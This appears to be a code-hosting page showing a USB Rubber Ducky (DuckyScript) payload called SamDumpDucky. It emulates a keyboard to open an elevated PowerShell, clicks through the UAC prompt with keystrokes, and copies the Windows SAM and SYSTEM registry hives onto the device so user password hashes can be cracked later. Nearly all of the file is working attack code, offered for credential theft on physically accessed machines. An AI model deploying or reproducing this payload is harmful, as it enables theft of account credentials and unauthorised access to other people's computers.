123 lines
3.8 KiB
Plaintext
123 lines
3.8 KiB
Plaintext
REM Title: SamDumpDucky
|
|
REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like pypykatz, to get the users hashes.
|
|
REM Author: 0i41E
|
|
REM Version: 2.0
|
|
REM Category: Credentials
|
|
REM Attackmodes: HID, Storage
|
|
|
|
ATTACKMODE HID STORAGE
|
|
|
|
REM Extension made by Korben to increase speed
|
|
EXTENSION DETECT_READY
|
|
REM VERSION 1.1
|
|
REM AUTHOR: Korben
|
|
|
|
REM_BLOCK DOCUMENTATION
|
|
USAGE:
|
|
Extension runs inline (here)
|
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
|
boot delay
|
|
|
|
TARGETS:
|
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
|
END_REM
|
|
|
|
REM CONFIGURATION:
|
|
DEFINE #RESPONSE_DELAY 25
|
|
DEFINE #ITERATION_LIMIT 120
|
|
|
|
VAR $C = 0
|
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
|
CAPSLOCK
|
|
DELAY #RESPONSE_DELAY
|
|
$C = ($C + 1)
|
|
END_WHILE
|
|
CAPSLOCK
|
|
END_EXTENSION
|
|
|
|
REM Extension made by 0i41E to automate elevated execution of powershell - Change language layout within here
|
|
EXTENSION WINDOWS_ELEVATED_EXECUTION
|
|
REM VERSION 1.1
|
|
REM Author: 0i41E
|
|
REM Executes the desired program with elevated privileges
|
|
REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts
|
|
REM additional extensions
|
|
|
|
REM CONFIGURATION:
|
|
REM Used to wait for the UAC prompt to react to input
|
|
DEFINE #INPUT_WAIT 2000
|
|
REM Shortcut for YES across multiple languages
|
|
DEFINE #ENGLISH_ACCEPT ALT y
|
|
DEFINE #GERMAN_ACCEPT ALT j
|
|
DEFINE #SPAIN_ACCEPT ALT s
|
|
|
|
FUNCTION Elevated_Execution()
|
|
DELAY #INPUT_WAIT
|
|
CTRL-SHIFT ENTER
|
|
DELAY #INPUT_WAIT
|
|
REM Change below for appropriate language
|
|
#GERMAN_ACCEPT
|
|
DELAY #INPUT_WAIT
|
|
END_FUNCTION
|
|
|
|
REM EXAMPLE USAGE AFTER EXTENSION
|
|
REM DELAY 2000
|
|
REM GUI r
|
|
REM DELAY 2000
|
|
REM STRING powershell
|
|
REM Elevated_Execution()
|
|
REM STRINGLN whoami /priv
|
|
|
|
END_EXTENSION
|
|
|
|
REM Extension by 0i41E, to signalize the successful execution of the payload
|
|
EXTENSION DETECT_FINISHED
|
|
REM VERSION 1.0
|
|
REM AUTHOR: 0i41E
|
|
|
|
REM_BLOCK DOCUMENTATION
|
|
USAGE:
|
|
Use the function Detect_Finished() to signal the finished execution of your payload.
|
|
END_REM
|
|
|
|
REM CONFIGURATION:
|
|
DEFINE #PAUSE 150
|
|
FUNCTION Detect_Finished()
|
|
IF ($_CAPSLOCK_ON == FALSE)
|
|
CAPSLOCK
|
|
DELAY #PAUSE
|
|
CAPSLOCK
|
|
DELAY #PAUSE
|
|
CAPSLOCK
|
|
DELAY #PAUSE
|
|
CAPSLOCK
|
|
ATTACKMODE OFF
|
|
ELSE IF
|
|
CAPSLOCK
|
|
DELAY #PAUSE
|
|
CAPSLOCK
|
|
DELAY #PAUSE
|
|
CAPSLOCK
|
|
ATTACKMODE OFF
|
|
END_IF
|
|
END_FUNCTION
|
|
END_EXTENSION
|
|
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell -nop -noni
|
|
REM Opening elevated powershell via extension
|
|
Elevated_Execution()
|
|
STRINGLN cd (gwmi win32_volume -f 'label=''DUCKY''').Name
|
|
DELAY 350
|
|
REM Dumping Sam&System and saving them onto the ducky. This may take some time, potentially over 2 minutes
|
|
STRING Write-Host "[+]Exfiltrating Sam&System..." -ForegroundColor Green;reg save hklm\sam DuckySam;Write-Host "[?]This may take a while..." -ForegroundColor Yellow;reg save hklm\system DuckySys;Write-Host "[+]Exfiltration Complete!" -ForegroundColor Green
|
|
STRINGLN ;(New-Object -comObject Shell.Application).Namespace(17).ParseName((gwmi win32_volume -f 'label=''DUCKY''').Name).InvokeVerb('Eject');(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');ExIt
|
|
DELAY 250
|
|
REM Waiting for CAPSLOCK, pressed by Powershell, to proceed with the finishing lines.
|
|
WAIT_FOR_CAPS_ON
|
|
DELAY 250
|
|
Detect_Finished()
|